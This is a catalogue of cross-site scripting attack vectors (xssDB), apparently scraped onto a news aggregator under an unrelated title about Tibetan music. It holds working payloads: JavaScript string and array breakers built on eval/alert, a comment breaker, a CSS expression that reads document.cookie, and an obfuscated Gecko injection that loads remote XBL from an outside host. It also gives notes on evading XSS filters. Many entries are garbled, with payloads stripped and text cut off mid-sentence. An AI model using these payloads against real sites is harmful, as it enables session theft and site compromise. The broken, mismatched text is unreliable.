Tibetan background music, instrumental: xssDB
Source: 百度文库 Editor: 九乡新闻网 Time: 2024/04/29 07:04:49
xssdb
This vector utilizes backslashes to exploit a parsing error in Gecko based browsers and injects a remote XBL.
tags: general, injection, gecko, style injection, xbl, obfuscated; author: thespanner.co.uk

backslash-obfuscated xbl injection - variant 2
#98\i\nd\in\g:&
#92url(//busi&
#110ess\i\nfo.&
#99o.uk\/labs
\/xbl\/xbl\
.xml\#xss)&>
This vector utilizes backslashes to exploit a parsing error in Gecko based browsers and injects a remote XBL. All important characters are obfuscated by unclosed entities.
tags: general, injection, gecko, style injection, xbl, obfuscated; author: thespanner.co.uk

backslash-obfuscated xbl injection - variant 3
This vector utilizes backslashes to exploit a parsing error in Gecko based browsers and injects a remote XBL. As we can see, Gecko based browsers accept various characters as valid tags.
tags: general, injection, gecko, style injection, xbl, obfuscated; author: thespanner.co.uk

backslash-obfuscated xbl injection - variant 4
This vector utilizes backslashes to exploit a parsing error in Gecko based browsers and injects a remote XBL. Furthermore, unclosed nbsp entities are used to obfuscate the string.
tags: general, injection, gecko, style injection, xbl, obfuscated; author: thespanner.co.uk

backslash-obfuscated xbl injection - variant 5
This vector utilizes backslashes to exploit a parsing error in Gecko based browsers and injects a remote XBL. Between any character of the original payload, null bytes are used to obfuscate.
tags: general, injection, gecko, style injection, xbl, obfuscated; author: thespanner.co.uk

base
Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work).
tags: general, evil tags; author: ha.ckers.org

basic back ticked attribute breaker
`>
This vector breaks back ticked attributes.
tags: general, html breaking, basic; author: kishor

basic double quoted attribute breaker
>
This vector breaks double quoted attributes and produces an alert.
tags: general, html breaking; author: kishor

basic js breaker
xyz onerror=alert(6);
This vector just fits between script tags and fires an alert.
tags: general, js breaking, basic; author: kishor

basic js breaker variant 1
1;a=eval;b=alert;a(b(/c/.source));
This vector breaks JS integer assignments.
tags: general, js breaking, basic, obfuscated; author: kishor

basic js breaker variant 2
1];a=eval;b=alert;a(b(17));//
This vector breaks JS integer assignments in arrays.
tags: general, js breaking, basic, obfuscated; author: kishor

basic js breaker variant 3
];a=eval;b=alert;a(b(16));//
This vector breaks JS when placed in double quoted arrays.
tags: general, js breaking; author: kishor

basic js breaker variant 4
'];a=eval;b=alert;a(b(15));//
This vector breaks JS when embedded in single quoted arrays.
tags: general, js breaking, basic, obfuscated; author: kishor

basic js breaker variant 5
1};a=eval;b=alert;a(b(14));//
JS literal object breaker for integer properties.
tags: general, js breaking, basic, obfuscated; author: kishor

basic js breaker variant 6
'};a=eval;b=alert;a(b(13));//
JS breaker for literal objects with single quoted string properties.
tags: general, js breaking, basic, obfuscated; author: kishor

basic js breaker variant 7
};a=eval;b=alert;a(b(12));//
JS breaker for literal objects with double quoted string properties.
tags: general, js breaking; author: kishor

basic js breaker variant 8
a=1;a=eval;b=alert;a(b(11));//
Can be used when JS can be injected directly.
tags: general, js breaking, basic, obfuscated; author: kishor

basic js breaker variant 9
;//%0da=eval;b=alert;a(b(10));//
Breaks double quoted strings, injects a comment, carriage return and finally an alert.
tags: general, js breaking, crlf; author: kishor

basic js breaker variant 10
';//%0da=eval;b=alert;a(b(9));//
Breaks single quoted strings, injects a comment, carriage return and finally an alert.
tags: general, js breaking, basic, obfuscated, crlf; author: kishor

basic single quoted attribute breaker
'>
This vector breaks single quoted attributes and appends an alert.
tags: general, html breaking, basic; author: kishor

basic title breaker
This basic vector breaks HTML titles and injects JavaScript.
tags: general, html breaking, basic, title breaking; author: kishor

bgsound
bgsound
tags: general, evil tags; author: ha.ckers.org

body background-image
Body image
tags: general, evil tags; author: ha.ckers.org

body onload
Body tag (I like this method because it doesn't require using any variants of "javascript:" or "

For some reason, Firefox picks up the script closing tag in the quoted string and then proceeds to process the remaining script tags as code.
tags: general, gecko, obfuscated, evil tags; author: t3rmin4t0r

commented-out block
Downlevel-hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job.
tags: general, obfuscated, conditional comments, internet explorer; author: ha.ckers.org

comment-breaker using obfuscated javascript
*/a=eval;b=alert;a(b(/e/.source));/*
This vector creates an alert by breaking multiline comments.
tags: general, comment breaking, js breaking; author: kishor

conditional style injection for ie
width: ((window.r==document.cookie)?'':alert(r=document.cookie))
This vector uses JavaScript conditional statements to inject an alert into CSS properties. It was once used as a PoC for a vulnerability in Stefan Di Paolo's data binding example.
tags: general, obfuscated, internet explorer, style injection; author: doctordan

content replace xss
Content replace as an attack vector (assuming "http://www.google.com/" is programmatically replaced with null). I actually used a similar attack vector against several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector ("java script:" was converted into "java script:").
tags: general, evil tags, obfuscated; author: ha.ckers.org

cookie manipulation
Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where

div background-image
tags: general, evil tags, style injection; author: ha.ckers.org

div background-image 2
Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279)
tags: general, evil tags, style injection; author: ha.ckers.org

div
Div - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and ""
tags: general, evil tags, style injection, internet explorer; author: ha.ckers.org

div w/unicode
Div background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the URL parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.
tags: general, evil tags, obfuscated; author: ha.ckers.org

double open angle brackets